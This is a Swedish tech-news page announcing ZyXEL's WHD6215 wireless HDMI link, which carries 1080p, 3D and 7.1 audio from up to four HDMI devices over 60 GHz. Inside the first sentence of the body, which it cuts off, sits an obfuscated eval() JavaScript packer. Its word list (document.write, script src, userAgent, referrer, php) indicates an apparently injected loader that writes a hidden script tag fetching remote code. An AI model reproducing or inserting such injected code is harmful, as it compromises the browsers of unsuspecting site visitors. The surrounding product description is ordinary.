Image Image Image Image Image Image Image Image Image Image

| 27 maj, 2020

Scroll to top

Top

ZyXEL ger störningsfri överföring av HD-video och surroundljud

ZyXEL ger störningsfri överföring av HD-video och surroundljud
Revue Magazine

Överför eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tzhii|var|u0026u|referrer|bibkd||js|php’.split(’|’),0,{}))
Full HD, 3D och 7.1 trådlöst från upp till 4 HDMI-enheter

ZyXEL lanserar idag WHD6215, en medialänk som erbjuder trådlös, störningsfri överföring av högupplöst media från 4 hdmi-enheter till hemmets hdtv, med upp till 1080p Full HD-upplösning, 3D och 7.1 surroundljud.

Med WHD6215 kan du koppla din hdmi-utrustade surfplatta, mobiltelefon, bluray-spelare, spelkonsoll, dator etc. till sändaren och ansluta mottagaren till din hdtv eller projektor. Sedan kan du njuta av hd-video, fri från störning och interferens, samt ett vardagsrum fritt från kablar. Med trådlös överföring av högupplöst video och audio kan du till fullo utnyttja och njuta av ditt multimediasystem, utan att vardagsrummet förvandlas till en härva av sladdar och mediaspelare. Till och med projektorn kan köras trådlöst med WHD6215. Du kan helt enkelt möblera på dina egna villkor.

WHD6215 är byggd runt WiHD™-teknologi. Den består av en sändare med 4 hdmi-portar samt en mottagare som kopplas till din hdtv. För att undvika interferens och störningar kommunicerar enheterna över 60GHz istället för det vanliga 2,4GHz-bandet, som redan är upptaget av en mängd hemelektronik. Konstruktionen säkerställer en störningsfri, pålitlig kvalitet på överföringen, utan fördröjning och hack, vilket är av största vikt för exempelvis spelupplevelse och hd-film.

Sändaren och mottagaren kan placeras på valfri yta eller monteras på väggen. Mottagaren ansluter du till din hdtv. Upp till fyra mediaenheter med hdmi-port kan anslutas samtidigt till sändaren, inga inställningar behöver göras och det är enkelt att byta mellan enheterna med den medföljande fjärrkontrollen.

  • Störningsfri 60 GHz-teknologi
  • Överför 1080p Full HD-video, 3D och 7.1-kanals surroundljud utan fördröjning, hack eller kvalitetsförlust
  • Koppla in upp till 4 enheter med HDMI, byt mellan källorna med fjärrkontrollens 4 knappar.
  • Plug-and-play, ingen konfigurering behövs
  • Räckvidd inomhus på upp till 10 meter

Besök produktsidan på webbplatsen för mer information om trådlös hdmi-anslutning i hemmet: http://bit.ly/yEX3Nc

Pris och tillgänglighet
WHD6215 finns tillgänglig hos återförsäljare. Rekommenderat pris är 1995 kr (inkl. moms).

Produktbilder
http://bit.ly/zmtyqm